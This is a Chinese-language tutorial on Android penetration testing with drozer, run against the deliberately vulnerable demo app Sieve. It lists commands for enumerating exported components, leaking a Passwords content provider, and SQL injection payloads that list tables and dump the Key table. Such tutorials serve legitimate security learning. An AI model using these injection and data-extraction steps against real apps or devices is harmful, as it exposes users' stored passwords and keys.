利用drozer进行Android渗透测试 - AndroSecurity

利用drozer进行Android渗透测试 - AndroSecurity

一、安装与启动

1. 安装  

第一步:从 http://mwr.to/drozer 下载Drozer (Windows Installer) 

第二步:在 Android 设备中安装 agent.apk

adb install agent.apk

2. 启动

第一步:在 PC 上使用 adb 进行端口转发,转发到 Drozer使用的端口 31415

adb forward tcp:31415 tcp:31415

第二步:在 Android 设备上开启 Drozer Agent

选择 embedded server-enable

第三步:在 PC 上开启 Drozer console

drozer console connect

二、测试步骤

1.获取包名

dz> run app.package.list -f sieve

com.mwr.example.sieve

2.获取应用的基本信息

run app.package.info -a com.mwr.example.sieve

3.确定攻击面

run app.package.attacksurface com.mwr.example.sieve

4.Activity

1 )获取 activity 信息

run app.activity.info -a com.mwr.example.sieve

2 )启动 activity

run app.activity.start --component com.mwr.example.sieve

dz> help app.activity.start

usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY]

[--component PACKAGE COMPONENT] [--data-uri DATA_URI]

[--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]

[--mimetype MIMETYPE]

5.Content Provider

1 )获取 Content Provider 信息

run app.provider.info -a com.mwr.example.sieve

(2)Content Providers (数据泄露)

先获取所有可以访问的 Uri : 

run scanner.provider.finduris -a com.mwr.example.sieve

获取各个 Uri 的数据:

run app.provider.query

content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical

查询到数据说明存在漏洞

(3)Content Providers SQL 注入)

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"

报错则说明存在 SQL 注入。

列出所有表:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

获取某个表(如 Key )中的数据:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

4 )同时检测 SQL 注入和目录遍历

run scanner.provider.injection -a com.mwr.example.sieve

run scanner.provider.traversal -a com.mwr.example.sieve

6.Service

(1)获取 service 详情

run app.service.info -a com.mwr.example.sieve

7. 其它模块

shell.start 在设备上开启一个交互shell

tools.file.upload / tools.file.download 上传/下载文件到设备

tools.setup.busybox / tools.setup.minimalsu 安装可用的二进制文件

你可能感兴趣的:(Android,测试,常用)